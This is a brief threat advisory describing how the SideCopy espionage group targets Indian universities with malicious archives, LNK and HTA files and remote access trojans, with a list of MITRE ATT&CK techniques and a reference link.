Threat Advisory

SideCopy APT Targets Universities via Malicious Website, LNK Files and RATs

Threat: Malicious Campaign
Threat Actor Name: SideCopy
Threat Actor Type: Espionage
Targeted Region: India
Alias: Fringe Leopard, G1008
Threat Actor Region: Pakistan
Targeted Sector: Education
Criticality: High

EXECUTIVE SUMMARY

A malicious website linked to the SideCopy APT group has been uncovered, revealing a sophisticated threat targeting South Asian nations, particularly India. This group, employs various tactics, including the use of malicious LNK files and complex infection chains, to compromise systems. Of particular concern is their focus on university students, potentially intersecting with other APT groups like Transparent Tribe.

The SideCopy APT group initiates its attacks through spam emails containing links to malicious archive files. Upon execution, these files trigger a sequence of events, including the download and execution of HTA files, leading to the deployment of malware payloads like Reverse RAT and Action RAT. The malware utilizes various techniques for persistence and evasion, adapting its behavior based on the presence of antivirus software. Furthermore, the group leverages PHP files on the malicious website to tailor attacks based on the victim's operating system.

The emergence of SideCopy poses a significant threat, especially to entities in South Asia, notably targeting India. Their intricate attack methods underscore the need for robust cybersecurity measures. Collaboration and information sharing are vital for understanding and mitigating the evolving threat landscape posed by groups like SideCopy and their potential intersections with other threat actors. Vigilance, adaptive defenses, and proactive response strategies are essential in safeguarding against such persistent threats.

THREAT PROFILE:

Tactic Technique Id Technique
Execution T1059 Command and Scripting Interpreter
T1053 Scheduled Task/Job
T1047 Windows Management Instrumentation
Persistence T1547 Boot or Logon Autostart Execution
Privilege Escalation T1574 Hijack Execution Flow
Defense Evasion T1027 Obfuscated Files or Information
T1140 Deobfuscate/Decode Files or Information
T1112 Modify Registry
Discovery T1082 System Information Discovery
T1083 File and Directory Discovery
T1518 Software Discovery
Command and Control T1071 Application Layer Protocol
T1105 Ingress Tool Transfer

REFERENCES:

The following reports contain further technical details:

https://cyble.com/blog/the-overlapping-cyber-strategies-of-transparent-tribe-and-sidecopy-against-india/

crossmenu